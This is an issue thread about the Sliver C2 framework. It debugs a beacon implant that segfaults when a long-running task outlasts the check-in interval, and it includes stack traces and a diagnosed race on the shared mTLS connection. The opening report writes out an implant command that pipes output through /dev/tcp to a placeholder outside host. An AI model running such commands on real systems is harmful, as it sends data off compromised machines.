sliver Beacon segfault after execute -o of long-running command

The command that was run, with some small changes and placeholders inserted:

execute -o bash -c '[command] > /dev/tcp/[IP]/[PORT]'

The command ([command]) completed successfully after ~20 minutes and the output was fully received on the destination server.

The beacon died - I assume after the command completed - and printed this:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x793710]

goroutine 820 [running]:
HlBbwQNJ.(*WM4lpECc).Write(0x0, {0xc0001da040, 0x4, 0x40})
        QJ07Wn7t.go:1 +0x70
etqB0NQJ.RCy7F1R7(0xc7c7c0?, 0xbd0e01?)
        AV7I1Kkr.go:1 +0xc5
I3atTgSN.dLgVWFtm.func4(0xd54a80?)
        qIjErSNA.go:1 +0x26
main.lG6ocYtX(0xc00009c370, {0xc000485fb8?, 0x5d52c5?, 0x0?})
        Dpz62hcW.go:1 +0x9ce
main.rmCpWGhH.func2()
        muvGUAl8.go:1 +0x67
created by main.rmCpWGhH
        U3YS4zcG.go:2 +0x555

Sep 29 '22 21:09 pb376

can you enable debug mode and send us the full stack trace

Sep 29 '22 21:09 moloch--

I ran execute -o bash -c 'sleep 120 && echo 123' and got:

[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x775c27]

goroutine 20 [running]:
crypto/tls.(*Conn).Write(0x0, {0xc00040aa80, 0x4, 0x40})
        /root/.sliver/go/src/crypto/tls/conn.go:1112 +0x67
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0004225a0)
        /root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:94 +0x2a5
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0004225a0)
        /root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x3a
main.beaconMain(0xc00018c000, {0xc0c5a1e6d59535ea, 0x243971b8da, 0xf34fa0})
        /root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:341 +0x1428
main.beaconMainLoop.func2()
        /root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:196 +0x76
created by main.beaconMainLoop
        /root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:194 +0x82a

Sep 29 '22 21:09 pb376

I have no familiarity with golang, but reading the relevant bits here, adding more nil checks for conn in the mtls functions would at the very least have avoided crashing in this spot.

I see that the task handling per checkin is performed in a goroutine, is there a possible race condition occurring here where, if the execution of all tasks in a checkin's beaconMain thread exceeds the beacon interval, then the next checkin's beaconMain would overwrite the conn object with a new one, losing the first checkin's conn? And if the first checkin takes longer than the beacon interval + the next checkin's beaconMain runtime, then the next one would close the conn and cause the issue here?

Sep 29 '22 22:09 pb376

@pb376 what version of Sliver are you running? I recall we fixed a similar issue a few days ago.

Sep 29 '22 22:09 rkervella

I built from source after that fix was merged into master.

Sep 29 '22 22:09 pb376

I see that the task handling per checkin is performed in a goroutine, is there a possible race condition occurring here where, if the execution of all tasks in a checkin's beaconMain thread exceeds the beacon interval, then the next checkin's beaconMain would overwrite the conn object with a new one, losing the first checkin's conn? And if the first checkin takes longer than the beacon interval + the next checkin's beaconMain runtime, then the next one would close the conn and cause the issue here?

Looks to me like Close is called, which sets the conn object to nil, and a Send event is called afterwards on that nil object. At least that's what it looks like at a high level.

Sep 29 '22 22:09 rkervella

I think that's it, with the Close being called by the next checkin's beaconMain.

sliver (linux_debug) > execute -o sleep 55
[...]
[+] linux_debug completed task b07bd8bd                                                                                                                                                                                                                        
[...]

works fine, but

sliver (linux_debug) > reconfig -i 10s
[...]
sliver (linux_debug) > reconfig -j 1s
[...]
sliver (linux_debug) > execute -o sleep 30

segfaults

Sep 29 '22 22:09 pb376

Some further confirmation, with the interval set to 10s and jitter 1s, I did:

sliver (linux_debug) > execute -o sleep 30

⚠️  Using --output in beacon mode, if the command blocks the task will never complete

[*] Tasked beacon linux_debug (75bd806e)

I watched the debug output to catch the beacon checkin and pull the tasks, then quickly did:

sliver (linux_debug) > execute -o sleep 60

⚠️  Using --output in beacon mode, if the command blocks the task will never complete

[*] Tasked beacon linux_debug (1081691d)

This time the subsequent checkin ran a sleep 60, so by the time the first checkin's sleep task completed the subsequent checkin had not yet finished its own tasks and closed conn, so the first checkin was able to finish successfully:

[+] linux_debug completed task 75bd806e

It then crashed about 60s later, as you'd expect here.

This could be fixed by adding a reference count for conn that Start/Close use, or by allowing each goroutine to maintain there own conn one way or another.

Sep 29 '22 22:09 pb376

I've hit this issue a few more times since, most recently while trying to download a large file. I took another look and believe what I had posted above is the root cause. It seems that decoupling the connections from the beacon object and having each goroutine use its own connection would fix this and probably help avoid other forms of related future trouble, but I'm not sure how many other things would need to be modified to accommodate a change like this. This could however cause connections to stack if there are many long-running commands being executed, which could become increasingly noticeable to sysadmins, so some type of reference counting scheme may be instead preferable if that is truly a concern of the general userbase. The extent of my experience writing go is the single line I added in a PR here a few weeks back, so I'm unfortunately not in any position to try to help more here or test ideas out, at least yet.

I do find it slightly strange that I seem to be the only one hitting this issue (or at least reporting it) given that I find myself running into it relatively often while doing routine things, so I was wondering if this perhaps did not affect other protocols (I'm using mtls) or if there are some non-default settings I should be using in general that would also help avoid this (aside from beacon interval.)

Oct 16 '22 07:10 pb376

I'll have to take a look, i'm not sure we can safely pass the connections to multiple goroutines without needing a variety of locks to prevent race conditions.

Oct 16 '22 14:10 moloch--

From a glance I think we're better off implementing a multiplexer using something like smux

Oct 16 '22 14:10 moloch--

Are there any plans to address this issue?

Aug 23 '23 06:08 pb376

I'm getting the same issue, but with sideload on the latest commit.

Trace

2023/09/17 20:30:23 task_linux.go:119: Done, stderr:                                                                                                                                                                                        
2023/09/17 20:30:23 sliver.go:355: [beacon] task completed (id: -3036368544394556068)                                                                                                                                                       
2023/09/17 20:30:23 sliver.go:390: [beacon] all tasks completed, sending results to server                                                                                                                                                  
2023/09/17 20:30:23 sliver.go:244: [beacon] closing ...                                                                                                                                                                                     
panic: runtime error: invalid memory address or nil pointer dereference                                                                                                                                                                     
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x7abe3b]                                                                                                                                                                      
                                                                                                                                                                                                                                            
goroutine 33 [running]:                                                                                                                                                                                                                     
crypto/tls.(*Conn).Write(0x0, {0xc000140000, 0x4, 0x40})                                                                                                                                                                                    
        crypto/tls/conn.go:1183 +0x5b                                                                                                                                                                                                       
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0004c2180)                                                                                                                                                 
        github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:97 +0x2fb                                                                                                                                                        
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0004c2180)                                                                                                                                                        
        github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x34                                                                                                                                                           
main.beaconMain(0xc0002a2000, {0xc13a040bf9da10c6, 0x3489f43475, 0x1243da0})                                                                                                                                                                
        github.com/bishopfox/sliver/sliver.go:315 +0xf23                                                                                                                                                                                    
main.beaconMainLoop.func2()                                                                                                                                                                                                                 
        github.com/bishopfox/sliver/sliver.go:206 +0x6a                                                                                                                                                                                     
created by main.beaconMainLoop in goroutine 1                                                                                                                                                                                               
        github.com/bishopfox/sliver/sliver.go:204 +0x865

Sep 18 '23 00:09 ArchWizard56

I'm honestly surprised there aren't more reports related to this. The issue is pretty much in the fundamental design of the concurrency model.

Nov 10 '23 02:11 pb376